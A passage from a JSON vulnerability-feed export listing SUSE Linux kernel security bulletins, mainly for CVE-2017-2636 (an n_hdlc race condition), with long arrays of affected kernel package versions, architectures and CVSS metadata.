"kernel-default-debugsource-3.0.101-97.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ia64", "packageName": "kernel-trace-debugsource", "packageFilename": "kernel-trace-debugsource-3.0.101-97.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-trace-devel", "packageFilename": "kernel-trace-devel-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-pae-debugsource", "packageFilename": "kernel-pae-debugsource-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-xen", "packageFilename": "kernel-xen-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-ec2-debuginfo", "packageFilename": "kernel-ec2-debuginfo-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-ec2-debugsource", "packageFilename": "kernel-ec2-debugsource-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-ec2-devel", "packageFilename": "kernel-ec2-devel-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ia64", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-3.0.101-97.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-source", "packageFilename": "kernel-source-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-default-extra", "packageFilename": "kernel-default-extra-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-bigmem-devel", "packageFilename": "kernel-bigmem-devel-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "s390x", "packageName": "kernel-default", "packageFilename": "kernel-default-3.0.101-97.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "s390x", "packageName": "kernel-trace-debuginfo", "packageFilename": "kernel-trace-debuginfo-3.0.101-97.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "s390x", "packageName": "kernel-trace-devel-debuginfo", "packageFilename": "kernel-trace-devel-debuginfo-3.0.101-97.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-bigmem-debugsource", "packageFilename": "kernel-bigmem-debugsource-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-pae-base", "packageFilename": "kernel-pae-base-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-xen-base", "packageFilename": "kernel-xen-base-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "s390x", "packageName": "kernel-default-man", "packageFilename": "kernel-default-man-3.0.101-97.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-trace-debugsource", "packageFilename": "kernel-trace-debugsource-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "s390x", "packageName": "kernel-trace-base", "packageFilename": "kernel-trace-base-3.0.101-97.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-xen-debugsource", "packageFilename": "kernel-xen-debugsource-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-97.1", "arch": "s390x", "packageName": "kernel-default-extra", "packageFilename": "kernel-default-extra-3.0.101-97.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ia64", "packageName": "kernel-default", "packageFilename": "kernel-default-3.0.101-97.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-trace-debuginfo", "packageFilename": "kernel-trace-debuginfo-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-trace", "packageFilename": "kernel-trace-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-trace-devel-debuginfo", "packageFilename": "kernel-trace-devel-debuginfo-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "s390x", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.0.101-97.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-trace-debuginfo", "packageFilename": "kernel-trace-debuginfo-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-ppc64-debugsource", "packageFilename": "kernel-ppc64-debugsource-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-default", "packageFilename": "kernel-default-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "s390x", "packageName": "kernel-source", "packageFilename": "kernel-source-3.0.101-97.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "ia64", "packageName": "kernel-trace-devel-debuginfo", "packageFilename": "kernel-trace-devel-debuginfo-3.0.101-97.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-trace", "packageFilename": "kernel-trace-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-trace-base", "packageFilename": "kernel-trace-base-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-trace-devel", "packageFilename": "kernel-trace-devel-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-pae-debuginfo", "packageFilename": "kernel-pae-debuginfo-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-97.1", "arch": "ppc64", "packageName": "kernel-ppc64-extra", "packageFilename": "kernel-ppc64-extra-3.0.101-97.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "i586", "packageName": "kernel-pae-devel-debuginfo", "packageFilename": "kernel-pae-devel-debuginfo-3.0.101-97.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "s390x", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-3.0.101-97.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-97.1", "arch": "x86_64", "packageName": "kernel-xen-extra", "packageFilename": "kernel-xen-extra-3.0.101-97.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-97.1", "arch": "s390x", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.0.101-97.1.s390x.rpm", "operator": "lt"}], "edition": 1, "description": "The SUSE Linux Enterprise 11 SP4 kernel was updated to fix the following\n security bug:\n\n CVE-2017-2636: A race condition in the n_hdlc tty Linux kernel driver\n (drivers/tty/n_hdlc.c) could have been exploited to gain a local privilege\n escalation (bnc#1027565)\n\n", "reporter": "Suse", "published": "2017-04-03T21:08:52", "title": "Security update for the Linux Kernel (important)", "type": "suse", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-2636"], "modified": "2017-04-03T21:08:52", "id": "SUSE-SU-2017:0912-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-04/msg00004.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-03T19:17:43", "references": ["https://bugzilla.suse.com/1027565"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-pae-debugsource", "packageFilename": "kernel-pae-debugsource-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-source", "packageFilename": "kernel-source-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-ec2-devel", "packageFilename": "kernel-ec2-devel-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Point of Sale", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-trace-devel", "packageFilename": "kernel-trace-devel-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-bigsmp-devel", "packageFilename": "kernel-bigsmp-devel-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-trace-devel", "packageFilename": "kernel-trace-devel-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-trace-debugsource", "packageFilename": "kernel-trace-debugsource-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-trace", "packageFilename": "kernel-trace-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE OpenStack Cloud", "OSVersion": "5", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-xen", "packageFilename": "kernel-xen-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-xen-debuginfo", "packageFilename": "kernel-xen-debuginfo-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Point of Sale", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-pae-devel", "packageFilename": "kernel-pae-devel-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-trace-debugsource", "packageFilename": "kernel-trace-debugsource-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE OpenStack Cloud", "OSVersion": "5", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-bigsmp-base", "packageFilename": "kernel-bigsmp-base-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-pae", "packageFilename": "kernel-pae-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE OpenStack Cloud", "OSVersion": "5", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-ec2-base", "packageFilename": "kernel-ec2-base-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-ec2", "packageFilename": "kernel-ec2-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-xen-extra", "packageFilename": "kernel-xen-extra-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE OpenStack Cloud", "OSVersion": "5", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-ec2-devel", "packageFilename": "kernel-ec2-devel-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-trace-devel", "packageFilename": "kernel-trace-devel-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-0.47.99.1", "arch": "ppc64", "packageName": "kernel-default-extra", "packageFilename": "kernel-default-extra-3.0.101-0.47.99.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE OpenStack Cloud", "OSVersion": "5", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Point of Sale", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-ec2-base", "packageFilename": "kernel-ec2-base-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Point of Sale", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-ec2", "packageFilename": "kernel-ec2-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-trace-extra", "packageFilename": "kernel-trace-extra-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "s390x", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-3.0.101-0.47.99.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Point of Sale", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-xen-base", "packageFilename": "kernel-xen-base-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-ec2-base", "packageFilename": "kernel-ec2-base-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE OpenStack Cloud", "OSVersion": "5", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-trace-base", "packageFilename": "kernel-trace-base-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-bigsmp-devel", "packageFilename": "kernel-bigsmp-devel-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-source", "packageFilename": "kernel-source-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager Proxy", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-trace", "packageFilename": "kernel-trace-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE OpenStack Cloud", "OSVersion": "5", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-bigsmp-devel", "packageFilename": "kernel-bigsmp-devel-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-default", "packageFilename": "kernel-default-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Manager Proxy", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager Proxy", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-ec2-base", "packageFilename": "kernel-ec2-base-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-xen-extra", "packageFilename": "kernel-xen-extra-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-ec2-base", "packageFilename": "kernel-ec2-base-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-ec2-debuginfo", "packageFilename": "kernel-ec2-debuginfo-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE OpenStack Cloud", "OSVersion": "5", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-bigsmp-base", "packageFilename": "kernel-bigsmp-base-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager Proxy", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-bigsmp-devel", "packageFilename": "kernel-bigsmp-devel-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-xen", "packageFilename": "kernel-xen-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-trace-base", "packageFilename": "kernel-trace-base-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-ec2-debugsource", "packageFilename": "kernel-ec2-debugsource-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "s390x", "packageName": "kernel-default", "packageFilename": "kernel-default-3.0.101-0.47.99.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-bigsmp-extra", "packageFilename": "kernel-bigsmp-extra-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "s390x", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.0.101-0.47.99.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-pae-base", "packageFilename": "kernel-pae-base-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "s390x", "packageName": "kernel-default-man", "packageFilename": "kernel-default-man-3.0.101-0.47.99.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Manager Proxy", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-xen-base", "packageFilename": "kernel-xen-base-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager Proxy", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-default", "packageFilename": "kernel-default-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Point of Sale", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-default", "packageFilename": "kernel-default-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE OpenStack Cloud", "OSVersion": "5", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-bigsmp", "packageFilename": "kernel-bigsmp-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Point of Sale", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "i586", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.0.101-0.47.99.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "s390x", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.0.101-0.47.99.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Manager Proxy", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-ec2-devel", "packageFilename": "kernel-ec2-devel-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "s390x", "packageName": "kernel-source", "packageFilename": "kernel-source-3.0.101-0.47.99.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Manager Proxy", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-source", "packageFilename": "kernel-source-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-bigsmp-debuginfo", "packageFilename": "kernel-bigsmp-debuginfo-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.3", "packageVersion": "3.0.101-0.47.99.1", "arch": "s390x", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.0.101-0.47.99.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Manager Proxy", "OSVersion": "2.1", "packageVersion": "3.0.101-0.47.99.1", "arch": "x86_64", "packageName": "kernel-trace-devel", "packageFilename": "kernel-trace-devel-3.0.101-0.47.99.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Manager Proxy", "OSVersion": "2.1", 